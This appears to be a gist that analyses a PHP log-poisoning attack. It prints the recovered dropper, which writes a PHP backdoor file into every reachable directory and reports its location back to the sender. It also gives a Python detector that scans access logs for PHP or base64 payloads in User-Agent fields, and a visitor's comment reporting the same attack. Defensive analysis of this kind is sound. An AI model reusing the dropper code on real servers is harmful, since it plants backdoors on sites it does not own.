Created February 15, 2013 17:54
PHP attack through log files (code in the User-Agent header)
// Dropper as recovered from the User-Agent field of the log. It writes a PHP
// file into the current directory and every subdirectory it can open, then
// prints a marker string so the sender learns where the file landed.
@ini_set('allow_url_fopen', 1);
addLoader();
$data = @opendir('.');
while ($file = @readdir($data))
{
    $file = trim($file);
    // skip '.' and '..' and anything that is not a directory
    if (!$file || preg_match('/^\.+$/', $file) || !is_dir($file)) continue;
    addLoader($file);
}
@closedir($data);
function addLoader($dir = '')
{
    if ($dir) $dir .= '/';
    @chmod($dir, 777); // decimal 777 (octal 01411), not 0777: a bug in the original sample
    $fp = fopen("{$dir}2716479cdad403d091d623daaf66cd15.php", "w");
    // the base64 payload body is not reproduced on this page
    fwrite($fp, base64_decode('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'));
    fclose($fp);
    if (file_exists("{$dir}2716479cdad403d091d623daaf66cd15.php"))
    {
        $ck = "1823649365820354";
        print "$ck:{*}:$dir:{*}:";
        exit;
    }
}
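A detection pass a defender can run over web-server access logs to find this kind of payload before it reaches an include, added here as an example and not part of the gist or its comments. It assumes Apache/nginx "combined" log format, where the User-Agent is the last quoted field; the IP addresses, timestamps and the doubly base64-wrapped sample are constructed. It also generalises the "decoded it twice" observation from the comment thread by peeling up to four base64 layers.

```python
import base64
import binascii
import re

# Apache/nginx "combined" log line; the User-Agent is the final quoted field.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# PHP source fragments that a genuine browser identification string never contains.
PHP_MARKERS = re.compile(
    r"<\?php|\beval\s*\(|\bbase64_decode\s*\(|@?ini_set\s*\(|\bfwrite\s*\(|\bopendir\s*\(|\bchmod\s*\(",
    re.IGNORECASE,
)
# A run of base64 alphabet long enough to be a payload rather than a token.
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def decode_layers(blob, max_depth=4):
    """Peel base64 wrappers off a blob one layer at a time and return the
    decoded text of each layer. Payloads are often encoded twice, so a
    single decode is not enough to see the PHP inside."""
    layers = []
    current = blob
    for _ in range(max_depth):
        padded = current + "=" * (-len(current) % 4)  # senders often drop the padding
        try:
            text = base64.b64decode(padded, validate=True).decode("ascii")
        except (binascii.Error, UnicodeDecodeError):
            break
        layers.append(text)
        inner = text.strip()
        if not B64_BLOB.fullmatch(inner):
            break
        current = inner
    return layers


def inspect_user_agent(ua):
    """Return (is_suspicious, reason, depth); depth is the number of base64
    layers removed before PHP code appeared (0 = PHP in the clear)."""
    if PHP_MARKERS.search(ua):
        return True, "php_source_in_ua", 0
    for blob in B64_BLOB.findall(ua):
        for depth, text in enumerate(decode_layers(blob), start=1):
            if PHP_MARKERS.search(text):
                return True, "php_source_base64", depth
    return False, "", 0


def scan_log(lines):
    """Parse combined-format log lines and return one finding per suspicious
    request: (client ip, request line, reason, base64 depth)."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line.rstrip("\n"))
        if not m:
            continue
        hit, reason, depth = inspect_user_agent(m.group("ua"))
        if hit:
            findings.append((m.group("ip"), m.group("req"), reason, depth))
    return findings


# Constructed sample traffic (not from the gist): one normal request, one with
# PHP in the clear, and one with the PHP wrapped in base64 twice, as the
# comment thread describes. Addresses are documentation ranges.
_inner = "<?php @ini_set('allow_url_fopen', 1); ?>"
_double = base64.b64encode(base64.b64encode(_inner.encode())).decode()
SAMPLE_LOG = [
    '203.0.113.5 - - [15/Feb/2013:17:54:01 +0100] "GET / HTTP/1.1" 200 512 "-" '
    '"Mozilla/5.0 (X11; Linux x86_64) Firefox/18.0"',
    '198.51.100.7 - - [15/Feb/2013:17:54:02 +0100] "GET /index.php HTTP/1.1" 200 512 "-" '
    '"<?php @ini_set(\'allow_url_fopen\', 1); ?>"',
    '198.51.100.7 - - [15/Feb/2013:17:54:03 +0100] "GET /index.php HTTP/1.1" 200 512 "-" '
    f'"{_double}"',
]

if __name__ == "__main__":
    for ip, req, reason, depth in scan_log(SAMPLE_LOG):
        print(f"{ip} {req!r} {reason} base64_depth={depth}")
```

Run it against a real access log with `scan_log(open("access.log"))`; the depth field tells you how many layers the sender wrapped the code in, and the request line shows which script was being hit when the log was poisoned.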
Hello,
Messed my logs up.
I missed my logs from a pay site.
Created some with PHP.
In my PHP created logs was a large 64-decode chunk where the UA would have been.
I decoded it twice, a piece of 64-decode within a piece.
I was fairly certain it was an attack of some kind.
Their IP was from Romania.
Yours is exactly the same as mine.
Please check out go.to/moo. corkymoo.net63.net
Any idea where this was coming from?